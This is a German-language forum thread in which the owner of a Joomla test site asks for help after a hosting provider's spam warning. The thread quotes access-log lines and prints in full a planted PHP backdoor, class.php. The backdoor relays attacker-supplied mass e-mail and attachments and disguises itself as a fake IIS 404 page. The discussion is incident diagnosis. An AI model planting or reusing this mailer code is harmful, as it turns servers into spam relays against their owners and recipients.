Thema: seltsame E-Mails

Hallo,
ich habe gerade von meinem Provider folgende E-Mail erhalten:

Hallo Herr xxxxxx,

wie wir soeben bei Wartungsarbeiten am Server festgestellen mussten, wird über Ihren Kundenaccount eine stark erhöhte Anzahl von E-Mails mittels eines PHP-Scripts versendet. Wir möchten und müssten Sie an dieser Stelle darauf aufmerksam machen, dass wir dies nicht dulden können (siehe AGB's/Verbotenes).

Bitte prüfen Sie daher umgehend die auf dem Account verwendeten Scripte, da diese offenbar durch eine Sicherheitslücke zum Spammen missbraucht wurden. In diesem Fall sollten Sie auf diese Scripte verzichten oder auf eine aktuellere (sicherere) Version updaten.

Verdächtige Scripte sind:

demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:01 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:02 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:05 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:06 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:08 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:09 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:11 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:13 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:15 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:16 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:18 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:20 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:22 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:23 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:25 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:26 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:29 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:30 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:32 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:33 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:36 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:37 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:39 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"
demo1.joomtemplate.de***194.219.65.130 - - [22/Jul/2009:12:46:40 +0200] "POST /includes/class.php HTTP/1.0" 200 314 "-" "-"

Bitte prüfen Sie umgehend o.g. Scripte auf die Aktualität und auf mögliche Sicherheitslücken!

Durch den Massenmail-Versand schaden Sie nicht nur anderen Kunden, sondern auch sich selbst, da der Server mit überdurchschnittlich vielen E-Mails belastet ist und die Zustellung normaler E-Mails länger dauert. Unter Umständen wird durch dieses Spammen und die bereits erfolgreich versendeten E-Mails der Server in den kommenden Stunden in der Mehrzahl der im Internet aktiven Spamlisten stehen, wodurch ein Zustellen von Mails an andere E-Mailanbieter nichtmehr gewährleistet ist. Der Schaden ist in einem solchen Fall enorm!

Nehmen Sie bitte in einer Antwort auf diese E-Mail unbedingt zeitnah mit uns Kontakt auf, damit wir dieses Ticket schließen können und nennen Sie uns die von Ihnen durchgeführen Maßnahmen zur Sicherung Ihres Webspaces, damit sich ein solcher Vorfall nicht wiederholt.



Mit freundlichen Grüßen
xxxxx
Supportabteilung

Bitte zitieren Sie immer den vollständigen vorherigen E-Mail-Verlauf!

xxx
xxx
xxx
xxx

-------------------------------------------------------------------------
Um Ihre Supportanfragen zügig bearbeiten zu können, geben Sie bitte in jeder Mail Ihren Domainnamen an !
-------------------------------------------------------------------------

Das ganze ist eine Testinstalation, die ausversehen genau die gleiche Datenbank (auch gleiches Präfix) wie eine zweite Testinstalation verwendet. Kann dies die Fehlerursache sein? Hat jemand eine andree Idee, an was das ganze liegen kann?

Gruss
magura

Da es diese Datei in einem normalen Joomla nicht gibt, wird Dir vielleicht jemand was untergejubelt haben...

Schau doch mal in die Datei rein...

Die datei enthällt folgenden Code:
Die Datei kommt auch nicht von mir, ich hatte nichtmal leserechte. musste mich erst über kas als besitzer eintragen, dann ging es.

PHP-Code:

<?


function MUKUBXsU($type,$mime,$xctmp,$from,$to,$subj,$text,$fname) {
$fun=fopen($fname,"rb");
$un=strtoupper(uniqid(time()));
$head.="From: ".$from."\r\n";
if ($xctmp!='') {$head.="X-Mailer: $xctmp\n";}
if ($mime!='') {$head.="Mime-Version: 1.0\n";}
$head.="Content-Type: multipart/mixed;\r\n";
$head.="boundary=\"".$un."\"\r\n\r\n";
$zag= "--".$un."\r\nContent-Type: ".$type."; charset=windows-1251\r\n";
$zag.="Content-Transfer-Encoding: 8bit\r\n\r\n".$text."\r\n";
$zag.="--".$un."\r\n";
$zag.="Content-Type: text/html; name=\"".basename($fname)."\"\r\n";
$zag.="Content-transfer-encoding: base64\r\n";
$zag.="Content-Disposition: attachment; filename=\"".basename($fname)."\"\r\n\r\n";
$zag.=chunk_split(base64_encode(fread($fun,filesize($fname))))."\r\n\r\n";
$zag.="--".$un."--\r\n\r\n";
return @mail("$to", "$subj", $zag, $head);
}

function bWTyPOWx($type,$mime,$xctmp,$from,$to,$subj,$text) {
$head="From: $from\n";
if ($xctmp!='') {$head.="X-Mailer: $xctmp\n";}
if ($mime!='') {$head.="Mime-Version: 1.0\n";}
$head.= "Content-type: ".$type."; charset=windows-1251" . "\r\n";
return @mail($to,$subj,$text,$head);
}

if (!empty($_POST['caption']) && !empty($_POST['email']) && !empty($_POST['btype']) && !empty($_POST['emailsend']) && !empty($_POST['message']) && ($_POST['index'] == 'send'))
{

  $xclient = substr(htmlspecialchars(trim($_POST['clientname'])), 0, 80);
  $title = substr(htmlspecialchars(trim($_POST['caption'])), 0, 80);
  $mess64 = base64_decode($_POST['message']);
  $mess =  substr(trim($mess64), 0, 10000000);
  $send_to = $_POST['emailsend'];    
  $from = $_POST['email'];
  $pmime = $_POST['mimevers'];
  $ptype = $_POST['btype'];
  
  if($_FILES['file']['name'] !=''){
    if (is_dir("tmp")) { } else { mkdir("tmp"); }
    if(is_uploaded_file($_FILES['file']['tmp_name']))   {
    if(move_uploaded_file($_FILES['file']['tmp_name'], "tmp/".basename($_FILES['file']['name']))) {
    if(MUKUBXsU($ptype,$pmime,$xclient,$from,$send_to,$title,$mess,"tmp/".basename($_FILES['file']['name']))!== FALSE) { echo "OK-FILE"; } else { echo "ERROR-FILE"; }
    @unlink("tmp/".basename($_FILES['file']['name']));
    } else { echo "ERROR-UPLOAD"; }
    } else { echo "ERROR-MOVE"; }
  } else {
             if(bWTyPOWx($ptype,$pmime,$xclient,$from,$send_to,$title,$mess) !== FALSE) {
           echo "OK-MESS"; } else { echo "ERROR-MESS"; }
       }
}
else
{
if ($_GET['index'] == 'test') {echo "OK2009"; exit;} else
{
echo '<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META **********="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
  BODY { font: 8pt/12pt verdana }
  H1 { font: 13pt/15pt verdana }
  H2 { font: 8pt/12pt verdana }
  A:link { color: red }
  A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
 the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
 and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>';}

}  
  
?>

Tja, da siehste ja was Sache ist.

Nun solltest Du mal schauen, wie da in Dein System eingebrochen wurde.

da ich mich mit sowas recht wenig auskenne, wäre ich über Tipps dankbar, wie ich an sowas rangehen soll.

Ich habe erstmal mein FTP-Passwort geändert.

demo1.joomtemplate.de ist die Domain, unter der das Script erreichbar war.

genau der bin ich...